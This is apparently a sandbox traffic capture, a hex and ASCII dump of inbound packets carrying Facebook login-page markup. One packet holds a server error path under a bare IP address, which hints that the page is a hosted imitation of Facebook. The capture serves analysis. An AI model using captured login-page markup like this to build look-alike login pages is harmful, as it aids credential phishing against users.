2022-10-07 14:00:15 UTC	1271	IN	Data Raw: 6f 6e 74 65 78 74 75 61 6c 44 69 61 6c 6f 67 41 72 72 6f 77 22 7d 2c 7b 22 5f 5f 6d 22 3a 22 43 6f 6e 74 65 78 74 75 61 6c 4c 61 79 65 72 50 6f 73 69 74 69 6f 6e 43 6c 61 73 73 4f 6e 43 6f 6e 74 65 78 74 22 7d 5d 2c 7b 22 61 6c 69 67 6e 68 22 3a 22 6c 65 66 74 22 2c 22 70 6f 73 69 74 69 6f 6e 22 3a 22 62 65 6c 6f 77 22 7d 5d 2c 32 5d 5d 2c 22 6d 61 72 6b 75 70 22 3a 5b 5b 22 5f 5f 6d 61 72 6b 75 70 5f 39 66 35 66 61 63 31 35 5f 30 5f 30 5f 4b 58 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 34 2d 69 32 20 5f 70 69 67 20 5f 39 6f 2d 63 20 5f 39 70 6c 6c 20 5f 35 30 66 34 5c 22 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 78 6c 32 5c 22 3e 5c 75 30 30 33 43 64 Data Ascii: ontextualDialogArrow"},{"__m":"ContextualLayerPositionClassOnContext"}],{"alignh":"left","position":"below"}],2]],"markup":[["__markup_9f5fac15_0_0_KX",{"__html":"\u003Cdiv>\u003Cdiv class=\"_4-i2 _pig _9o-c _9pll _50f4\">\u003Cdiv class=\"_9xl2\">\u003Cd
2022-10-07 14:00:15 UTC	1273	IN	Data Raw: 5c 22 5f 39 78 6f 32 5c 22 3e 5c 75 30 30 33 43 69 20 63 6c 61 73 73 3d 5c 22 69 6d 67 20 73 70 5f 32 6d 79 76 41 42 71 71 4b 71 71 20 73 78 5f 32 61 30 33 66 61 5c 22 3e 5c 75 30 30 33 43 5c 2f 69 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 78 6f 34 5c 22 3e 50 72 6f 76 69 64 65 20 61 6e 64 20 69 6d 70 72 6f 76 65 20 46 61 63 65 62 6f 6f 6b 20 50 72 6f 64 75 63 74 73 20 66 6f 72 20 70 65 6f 70 6c 65 20 77 68 6f 20 68 61 76 65 20 61 6e 20 61 63 63 6f 75 6e 74 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 78 6f 30 5c 22 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 64 69 76 3e Data Ascii: \"_9xo2\">\u003Ci class=\"img sp_2myvABqqKqq sx_2a03fa\">\u003C\/i>\u003Cdiv class=\"_9xo4\">Provide and improve Facebook Products for people who have an account\u003C\/div>\u003C\/div>\u003C\/div>\u003Cdiv class=\"_9xo0\">\u003C\/div>\u003Cdiv>\u003Cdiv>
2022-10-07 14:00:15 UTC	1274	IN	Data Raw: 3e 43 6f 6e 74 72 6f 6c 73 20 69 6e 20 79 6f 75 72 20 46 61 63 65 62 6f 6f 6b 20 61 63 63 6f 75 6e 74 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 73 70 61 6e 3e 5c 75 30 30 33 43 73 70 61 6e 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 67 20 5f 39 76 37 76 5c 22 3e 5c 75 30 30 33 43 69 20 63 6c 61 73 73 3d 5c 22 69 6d 67 20 73 70 5f 32 6d 79 76 41 42 71 71 4b 71 71 20 73 78 5f 35 38 66 32 65 31 5c 22 3e 5c 75 30 30 33 43 5c 2f 69 3e 5c 75 30 30 33 43 5c 2f 73 70 61 6e 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 62 75 74 74 6f 6e 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 62 20 5f 39 6e 67 61 5c 22 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6d 5c 22 3e Data Ascii: >Controls in your Facebook account\u003C\/div>\u003C\/span>\u003Cspan class=\"_9ngg _9v7v\">\u003Ci class=\"img sp_2myvABqqKqq sx_58f2e1\">\u003C\/i>\u003C\/span>\u003C\/div>\u003C\/button>\u003Cdiv class=\"_9ngb _9nga\">\u003Cdiv>\u003Cp class=\"_9o-m\">
2022-10-07 14:00:15 UTC	1276	IN	Data Raw: 5f 39 73 69 2d 5c 22 3e 4f 66 66 2d 46 61 63 65 62 6f 6f 6b 20 61 63 74 69 76 69 74 79 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6d 5c 22 3e 59 6f 75 20 63 61 6e 20 72 65 76 69 65 77 20 79 6f 75 72 20 6f 66 66 2d 46 61 63 65 62 6f 6f 6b 20 61 63 74 69 76 69 74 79 2c 20 77 68 69 63 68 20 69 73 20 61 20 73 75 6d 6d 61 72 79 20 6f 66 20 61 63 74 69 76 69 74 79 20 74 68 61 74 20 62 75 73 69 6e 65 73 73 65 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 20 73 68 61 72 65 20 77 69 74 68 20 75 73 20 61 62 6f 75 74 20 79 6f 75 72 20 69 6e 74 65 72 61 63 74 69 6f 6e 73 20 77 69 74 68 20 74 68 65 6d 2c 20 73 75 63 68 20 61 73 20 76 69 73 69 74 69 6e 67 20 74 68 65 69 72 20 61 70 70 73 20 6f 72 20 77 65 62 73 Data Ascii: _9si-\">Off-Facebook activity\u003C\/p>\u003Cp class=\"_9o-m\">You can review your off-Facebook activity, which is a summary of activity that businesses and organizations share with us about your interactions with them, such as visiting their apps or webs
2022-10-07 14:00:15 UTC	1277	IN	Data Raw: 41 4c 33 32 43 73 34 32 51 78 6f 4b 37 42 78 77 5a 71 4f 75 5a 58 76 6e 53 36 58 55 4c 71 54 34 42 72 77 52 64 62 43 57 30 6a 79 4a 63 6a 67 55 50 4c 77 54 51 34 54 57 77 78 59 63 31 6f 43 32 46 4c 56 32 55 4c 38 62 69 45 65 4b 36 52 67 5c 22 20 74 61 72 67 65 74 3d 5c 22 5f 62 6c 61 6e 6b 5c 22 20 72 65 6c 3d 5c 22 6e 6f 66 6f 6c 6c 6f 77 5c 22 20 64 61 74 61 2d 6c 79 6e 78 2d 6d 6f 64 65 3d 5c 22 68 6f 76 65 72 5c 22 3e 44 69 67 69 74 61 6c 20 41 64 76 65 72 74 69 73 69 6e 67 20 41 6c 6c 69 61 6e 63 65 5c 75 30 30 33 43 5c 2f 61 3e 20 69 6e 20 74 68 65 20 55 53 2c 20 74 68 65 20 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 2e 70 68 70 3f 75 3d 68 74 74 70 73 5c 75 30 30 32 Data Ascii: AL32Cs42QxoK7BxwZqOuZXvnS6XULqT4BrwRdbCW0jyJcjgUPLwTQ4TWwxYc1oC2FLV2UL8biEeK6Rg\" target=\"_blank\" rel=\"nofollow\" data-lynx-mode=\"hover\">Digital Advertising Alliance\u003C\/a> in the US, the \u003Ca href=\"https:\/\/l.facebook.com\/l.php?u=https\u002
2022-10-07 14:00:15 UTC	1279	IN	Data Raw: 30 30 33 43 6c 69 3e 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 2e 70 68 70 3f 75 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 6f 70 74 6f 75 74 2e 61 62 6f 75 74 61 64 73 2e 69 6e 66 6f 5c 75 30 30 32 35 32 46 26 61 6d 70 3b 68 3d 41 54 31 47 42 7a 4e 74 71 64 42 6d 57 32 33 6b 78 45 62 63 30 45 49 64 53 53 4b 75 4b 4c 39 32 41 36 50 44 73 34 75 46 57 59 4b 67 70 36 73 63 59 2d 66 6c 74 35 6d 73 61 37 74 76 6d 6b 41 49 2d 69 59 6d 49 59 31 71 49 36 4c 71 59 41 4d 38 38 5a 78 33 45 6f 63 68 62 5f 42 41 44 4b 35 58 6a 53 65 41 42 45 49 6e 67 38 76 42 46 43 52 73 5a 71 64 70 31 50 33 70 66 62 74 6a 6a 6b 4b 70 79 72 6f 6b 5f 75 78 Data Ascii: 003Cli>\u003Ca href=\"https:\/\/l.facebook.com\/l.php?u=https\u00253A\u00252F\u00252Foptout.aboutads.info\u00252F&h=AT1GBzNtqdBmW23kxEbc0EIdSSKuKL92A6PDs4uFWYKgp6scY-flt5msa7tvmkAI-iYmIY1qI6LqYAM88Zx3Eochb_BADK5XjSeABEIng8vBFCRsZqdp1P3pfbtjjkKpyrok_ux
2022-10-07 14:00:15 UTC	1280	IN	Data Raw: 6e 3e 5c 75 30 30 33 43 73 70 61 6e 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 67 20 5f 39 76 37 76 5c 22 3e 5c 75 30 30 33 43 69 20 63 6c 61 73 73 3d 5c 22 69 6d 67 20 73 70 5f 32 6d 79 76 41 42 71 71 4b 71 71 20 73 78 5f 35 38 66 32 65 31 5c 22 3e 5c 75 30 30 33 43 5c 2f 69 3e 5c 75 30 30 33 43 5c 2f 73 70 61 6e 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 62 75 74 74 6f 6e 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 62 20 5f 39 6e 67 61 5c 22 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6d 5c 22 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 6f 72 20 64 65 76 69 63 65 20 6d 61 79 20 6f 66 66 65 72 20 73 65 74 74 69 6e 67 73 20 74 68 61 74 20 61 6c 6c 6f 77 20 79 6f 75 20 Data Ascii: n>\u003Cspan class=\"_9ngg _9v7v\">\u003Ci class=\"img sp_2myvABqqKqq sx_58f2e1\">\u003C\/i>\u003C\/span>\u003C\/div>\u003C\/button>\u003Cdiv class=\"_9ngb _9nga\">\u003Cdiv>\u003Cp class=\"_9o-m\">Your browser or device may offer settings that allow you
2022-10-07 14:00:15 UTC	1282	IN	Data Raw: 5a 56 66 34 56 47 64 52 77 38 79 4c 4c 75 44 70 5f 31 62 4f 52 56 63 74 2d 4c 43 73 4d 50 6f 31 4e 6f 50 56 33 56 43 68 62 43 42 63 76 32 42 67 5c 22 20 74 61 72 67 65 74 3d 5c 22 5f 62 6c 61 6e 6b 5c 22 20 72 65 6c 3d 5c 22 6e 6f 66 6f 6c 6c 6f 77 5c 22 20 64 61 74 61 2d 6c 79 6e 78 2d 6d 6f 64 65 3d 5c 22 68 6f 76 65 72 5c 22 3e 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 5c 75 30 30 33 43 5c 2f 61 3e 5c 75 30 30 33 43 5c 2f 6c 69 3e 5c 75 30 30 33 43 6c 69 3e 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 2e 70 68 70 3f 75 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 Data Ascii: ZVf4VGdRw8yLLuDp_1bORVct-LCsMPo1NoPV3VChbCBcv2Bg\" target=\"_blank\" rel=\"nofollow\" data-lynx-mode=\"hover\">Internet Explorer\u003C\/a>\u003C\/li>\u003Cli>\u003Ca href=\"https:\/\/l.facebook.com\/l.php?u=https\u00253A\u00252F\u00252Fsupport.mozilla.org
2022-10-07 14:00:15 UTC	1283	IN	Data Raw: 6d 5c 75 30 30 32 35 32 46 6e 65 77 73 5c 75 30 30 32 35 32 46 32 30 31 35 5c 75 30 30 32 35 32 46 30 38 5c 75 30 30 32 35 32 46 68 6f 77 2d 74 6f 2d 6d 61 6e 61 67 65 2d 63 6f 6f 6b 69 65 73 2d 69 6e 2d 6f 70 65 72 61 5c 75 30 30 32 35 32 46 26 61 6d 70 3b 68 3d 41 54 32 43 7a 66 61 54 6c 50 32 37 46 38 62 38 45 49 71 6c 54 4d 45 46 7a 57 45 43 70 67 73 5f 76 6b 45 41 6d 65 41 33 4b 30 73 4e 58 6c 47 66 44 41 65 6d 4b 68 66 79 79 69 47 6d 5a 69 31 6a 56 50 51 72 48 62 6d 51 59 73 35 36 70 78 4f 44 70 78 37 33 49 4c 48 4c 49 59 4f 78 63 6e 58 46 43 77 38 2d 4b 56 33 4c 4a 71 4a 5a 71 78 52 46 62 52 7a 4d 44 72 48 76 6a 48 72 62 77 74 4e 64 76 51 4d 42 59 32 66 78 34 37 73 54 32 61 51 79 50 63 6a 6c 51 77 5c 22 20 74 61 72 67 65 74 3d 5c 22 5f 62 6c 61 6e Data Ascii: m\u00252Fnews\u00252F2015\u00252F08\u00252Fhow-to-manage-cookies-in-opera\u00252F&h=AT2CzfaTlP27F8b8EIqlTMEFzWECpgs_vkEAmeA3K0sNXlGfDAemKhfyyiGmZi1jVPQrHbmQYs56pxODpx73ILHLIYOxcnXFCw8-KV3LJqJZqxRFbRzMDrHvjHrbwtNdvQMBY2fx47sT2aQyPcjlQw\" target=\"_blan
2022-10-07 14:00:15 UTC	1285	IN	Data Raw: 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 37 5f 78 51 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 46 72 61 6e 5c 75 30 30 65 37 61 69 73 20 28 46 72 61 6e 63 65 29 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 38 5f 77 75 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 49 74 61 6c 69 61 6e 6f 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 39 5f 72 31 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 4d 61 67 79 61 72 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 61 5f 6b 45 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 4e 65 64 65 72 6c 61 6e 64 73 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 62 5f 46 37 22 Data Ascii: ],["__markup_3310c079_0_7_xQ",{"__html":"Fran\u00e7ais (France)"},1],["__markup_3310c079_0_8_wu",{"__html":"Italiano"},1],["__markup_3310c079_0_9_r1",{"__html":"Magyar"},1],["__markup_3310c079_0_a_kE",{"__html":"Nederlands"},1],["__markup_3310c079_0_b_F7"
2022-10-07 14:00:15 UTC	1286	IN	Data Raw: 63 30 37 39 5f 30 5f 74 5f 31 30 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 5c 75 34 65 32 64 5c 75 36 35 38 37 28 5c 75 39 39 39 39 5c 75 36 65 32 66 29 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 75 5f 4c 36 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 5c 75 36 35 65 35 5c 75 36 37 32 63 5c 75 38 61 39 65 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 76 5f 6f 4d 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 5c 75 64 35 35 63 5c 75 61 64 36 64 5c 75 63 35 62 34 22 7d 2c 31 5d 5d 2c 22 65 6c 65 6d 65 6e 74 73 22 3a 5b 5b 22 5f 5f 65 6c 65 6d 5f 30 37 32 62 38 65 36 34 5f 30 5f 30 5f 31 31 22 2c 22 75 5f 30 5f 30 5f 67 37 22 2c 31 5d 2c 5b 22 5f 5f 65 6c 65 6d 5f 39 34 63 31 35 33 38 35 5f 30 5f Data Ascii: c079_0_t_10",{"__html":"\u4e2d\u6587(\u9999\u6e2f)"},1],["__markup_3310c079_0_u_L6",{"__html":"\u65e5\u672c\u8a9e"},1],["__markup_3310c079_0_v_oM",{"__html":"\ud55c\uad6d\uc5b4"},1]],"elements":[["__elem_072b8e64_0_0_11","u_0_0_g7",1],["__elem_94c15385_0_
2022-10-07 14:00:15 UTC	1287	IN	Data Raw: 32 35 32 30 61 6e 64 5c 75 30 30 32 35 32 30 77 69 6c 6c 5c 75 30 30 32 35 32 30 62 65 5c 75 30 30 32 35 32 30 72 65 6d 6f 76 65 64 5c 75 30 30 32 35 32 30 69 6e 5c 75 30 30 32 35 32 30 74 68 65 5c 75 30 30 32 35 32 30 66 75 74 75 72 65 3a 5c 75 30 30 32 35 32 30 75 73 65 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 69 5c 75 30 30 32 35 32 30 6f 72 5c 75 30 30 32 35 32 30 50 44 4f 5c 75 30 30 32 35 32 30 69 6e 73 74 65 61 64 5c 75 30 30 32 35 32 30 69 6e 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 5c 2f 77 77 77 5c 2f 77 77 77 72 6f 6f 74 5c 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 5c 2f 73 65 65 6d 6f 72 65 62 74 79 5c 2f 69 6e 63 6c 75 64 65 73 5c 2f 64 61 74 61 62 61 73 65 2e 70 68 70 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 Data Ascii: 2520and\u002520will\u002520be\u002520removed\u002520in\u002520the\u002520future:\u002520use\u002520mysqli\u002520or\u002520PDO\u002520instead\u002520in\u002520\u00253Cb\u00253E\/www\/wwwroot\/103.136.42.153\/seemorebty\/includes\/database.php\u00253C\/b\u
2022-10-07 14:00:15 UTC	1289	IN	Data Raw: 6c 69 63 6b 4c 6f 67 67 65 72 22 2c 22 69 6e 69 74 22 2c 5b 22 5f 5f 65 6c 65 6d 5f 34 35 65 39 34 64 64 38 5f 30 5f 30 5f 65 4d 22 2c 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 30 5f 45 38 22 5d 2c 5b 5b 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 34 35 65 39 34 64 64 38 5f 30 5f 30 5f 65 4d 22 7d 2c 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 30 5f 45 38 22 7d 5d 5d 5d 2c 5b 22 4b 65 79 62 6f 61 72 64 41 63 74 69 76 69 74 79 4c 6f 67 67 65 72 22 2c 22 69 6e 69 74 22 2c 5b 5d 2c 5b 5d 5d 2c 5b 22 46 6f 63 75 73 52 69 6e 67 22 2c 22 69 6e 69 74 22 2c 5b 5d 2c 5b 5d 5d 2c 5b 22 45 72 72 6f 72 4d 65 73 73 61 67 65 43 6f 6e 73 6f 6c 65 22 2c 22 6c 69 73 74 65 6e 46 6f 72 55 6e 63 61 75 67 68 74 45 72 72 6f 72 Data Ascii: lickLogger","init",["__elem_45e94dd8_0_0_eM","__elem_a588f507_0_0_E8"],[[{"__m":"__elem_45e94dd8_0_0_eM"},{"__m":"__elem_a588f507_0_0_E8"}]]],["KeyboardActivityLogger","init",[],[]],["FocusRing","init",[],[]],["ErrorMessageConsole","listenForUncaughtError
2022-10-07 14:00:15 UTC	1290	IN	Data Raw: 61 64 62 35 30 35 61 37 36 35 38 36 34 61 37 31 32 62 35 36 32 37 34 63 61 35 36 31 36 30 38 37 31 34 32 31 38 61 35 36 38 33 35 38 22 2c 22 6b 65 79 49 64 22 3a 34 30 7d 7d 5d 5d 2c 5b 22 42 72 6f 77 73 65 72 50 72 65 66 69 6c 6c 4c 6f 67 67 69 6e 67 22 2c 22 69 6e 69 74 43 6f 6e 74 61 63 74 70 6f 69 6e 74 46 69 65 6c 64 4c 6f 67 67 69 6e 67 22 2c 5b 5d 2c 5b 7b 22 63 6f 6e 74 61 63 74 70 6f 69 6e 74 46 69 65 6c 64 49 44 22 3a 22 65 6d 61 69 6c 22 2c 22 73 65 72 76 65 72 50 72 65 66 69 6c 6c 22 3a 22 22 7d 5d 5d 2c 5b 22 42 72 6f 77 73 65 72 50 72 65 66 69 6c 6c 4c 6f 67 67 69 6e 67 22 2c 22 69 6e 69 74 50 61 73 73 77 6f 72 64 46 69 65 6c 64 4c 6f 67 67 69 6e 67 22 2c 5b 5d 2c 5b 7b 22 70 61 73 73 77 6f 72 64 46 69 65 6c 64 49 44 22 3a 22 70 61 73 73 22 Data Ascii: adb505a765864a712b56274ca561608714218a568358","keyId":40}}]],["BrowserPrefillLogging","initContactpointFieldLogging",[],[{"contactpointFieldID":"email","serverPrefill":""}]],["BrowserPrefillLogging","initPasswordFieldLogging",[],[{"passwordFieldID":"pass"
2022-10-07 14:00:15 UTC	1292	IN	Data Raw: 3d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 70 3d 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 3b 72 65 74 75 72 6e 20 70 26 26 70 2e 6e 6f 77 26 26 70 2e 74 69 6d 69 6e 67 26 26 70 2e 74 69 6d 69 6e 67 2e 6e 61 76 69 67 61 74 69 6f 6e 53 74 61 72 74 3f 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 70 2e 6e 6f 77 28 29 2b 70 2e 74 69 6d 69 6e 67 2e 6e 61 76 69 67 61 74 69 6f 6e 53 74 61 72 74 7d 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 7d 3b 7d 29 28 29 3b 77 69 6e 64 6f 77 2e 5f 5f 62 69 67 50 69 70 65 46 52 3d 6e 6f 77 5f 69 6e 6c 28 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 Data Ascii: =(function(){var p=window.performance;return p&&p.now&&p.timing&&p.timing.navigationStart?function(){return p.now()+p.timing.navigationStart}:function(){return new Date().getTime()};})();window.__bigPipeFR=now_inl();</script><link rel="preload" href="htt
2022-10-07 14:00:15 UTC	1293	IN	Data Raw: 79 4f 2f 6c 2f 30 2c 63 72 6f 73 73 2f 5a 33 2d 6c 5a 68 4a 30 53 46 31 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 74 79 6c 65 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 72 2f 72 2f 4d 2d 32 34 6b 57 63 4f 74 31 61 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 63 72 69 70 74 22 20 6e 6f 6e 63 65 3d 22 5a 77 71 30 45 79 76 6a 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 Data Ascii: yO/l/0,cross/Z3-lZhJ0SF1.css?_nc_x=Ij3Wp8lg5Kz" as="style" /><link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yr/r/M-24kWcOt1a.js?_nc_x=Ij3Wp8lg5Kz" as="script" nonce="Zwq0Eyvj" /><link rel="preload" href="https://static.xx.fbcdn.net/rs
2022-10-07 14:00:15 UTC	1295	IN	Data Raw: 2c 22 56 4b 39 6b 6a 61 74 22 2c 22 73 35 2b 44 36 55 4c 22 2c 22 50 2f 6d 72 35 56 45 22 2c 22 68 49 77 41 32 57 36 22 5d 2c 69 64 3a 22 66 69 72 73 74 5f 72 65 73 70 6f 6e 73 65 22 2c 70 68 61 73 65 3a 30 2c 6c 61 73 74 5f 69 6e 5f 70 68 61 73 65 3a 74 72 75 65 2c 74 74 69 5f 70 68 61 73 65 3a 30 2c 61 6c 6c 5f 70 68 61 73 65 73 3a 5b 36 33 5d 2c 68 73 72 70 3a 7b 68 62 6c 70 3a 7b 63 6f 6e 73 69 73 74 65 6e 63 79 3a 7b 72 65 76 3a 31 30 30 36 33 34 31 35 32 34 7d 7d 7d 2c 61 6c 6c 52 65 73 6f 75 72 63 65 73 3a 5b 22 51 4d 6d 34 47 43 6d 22 2c 22 62 7a 34 30 48 6f 72 22 2c 22 4a 4f 4c 4c 30 34 32 22 2c 22 42 49 79 6c 4b 43 34 22 2c 22 38 7a 62 45 5a 74 75 22 2c 22 76 47 74 32 6d 78 7a 22 2c 22 68 4b 59 30 51 4b 54 22 2c 22 6d 52 70 44 77 6d 64 22 2c 22 Data Ascii: ,"VK9kjat","s5+D6UL","P/mr5VE","hIwA2W6"],id:"first_response",phase:0,last_in_phase:true,tti_phase:0,all_phases:[63],hsrp:{hblp:{consistency:{rev:1006341524}}},allResources:["QMm4GCm","bz40Hor","JOLL042","BIylKC4","8zbEZtu","vGt2mxz","hKY0QKT","mRpDwmd","
2022-10-07 14:00:15 UTC	1295	IN	Data Raw: 32 32 63 38 0d 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 5a 77 71 30 45 79 76 6a 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 6e 6f 77 5f 69 6e 6c 28 29 3b 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 5f 5f 62 69 67 50 69 70 65 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 62 69 67 50 69 70 65 29 7b 62 69 67 50 69 70 65 2e 62 65 66 6f 72 65 50 61 67 65 6c 65 74 41 72 72 69 76 65 28 22 6c 61 73 74 5f 72 65 73 70 6f 6e 73 65 22 2c 6e 29 3b 7d 29 7d 29 28 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 5a 77 71 30 45 79 76 6a 22 3e 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 5f 5f 62 69 67 50 69 70 65 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 62 69 67 50 69 70 65 29 7b 62 69 67 50 69 70 65 2e 6f 6e 50 61 67 65 6c 65 74 41 Data Ascii: 22c8<script nonce="Zwq0Eyvj">(function(){var n=now_inl();requireLazy(["__bigPipe"],function(bigPipe){bigPipe.beforePageletArrive("last_response",n);})})();</script><script nonce="Zwq0Eyvj">requireLazy(["__bigPipe"],(function(bigPipe){bigPipe.onPageletA
2022-10-07 14:00:15 UTC	1297	IN	Data Raw: 43 5a 59 39 44 7a 31 5f 53 62 30 46 4f 55 4d 6e 49 4d 38 6c 66 2d 6d 51 42 72 67 56 6b 4d 46 70 79 44 6a 53 31 42 4c 49 69 58 4a 49 4f 41 6b 72 6d 41 38 59 43 79 6f 4d 62 4e 51 6c 61 45 56 77 32 68 68 47 6f 2d 56 64 62 67 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 30 38 33 31 31 36 22 2c 5b 22 58 41 73 79 6e 63 52 65 71 75 65 73 74 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 58 41 73 79 6e 63 52 65 71 75 65 73 74 22 2c 22 41 61 33 69 46 55 61 73 36 6b 39 68 35 38 64 4a 6e 43 5a 59 39 44 7a 31 5f 53 62 30 46 4f 55 4d 6e 49 4d 38 6c 66 2d 6d 51 42 72 67 56 6b 4d 46 70 79 44 6a 53 31 42 4c 49 69 58 4a 49 4f 41 6b 72 6d 41 38 59 43 79 6f 4d 62 4e 51 6c 61 45 56 77 32 68 68 47 6f 2d 56 64 62 67 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 30 38 33 31 31 37 22 2c 5b 5d 2c 7b Data Ascii: CZY9Dz1_Sb0FOUMnIM8lf-mQBrgVkMFpyDjS1BLIiXJIOAkrmA8YCyoMbNQlaEVw2hhGo-Vdbg"]},-1],["cr:1083116",["XAsyncRequest"],{__rc:["XAsyncRequest","Aa3iFUas6k9h58dJnCZY9Dz1_Sb0FOUMnIM8lf-mQBrgVkMFpyDjS1BLIiXJIOAkrmA8YCyoMbNQlaEVw2hhGo-Vdbg"]},-1],["cr:1083117",[],{
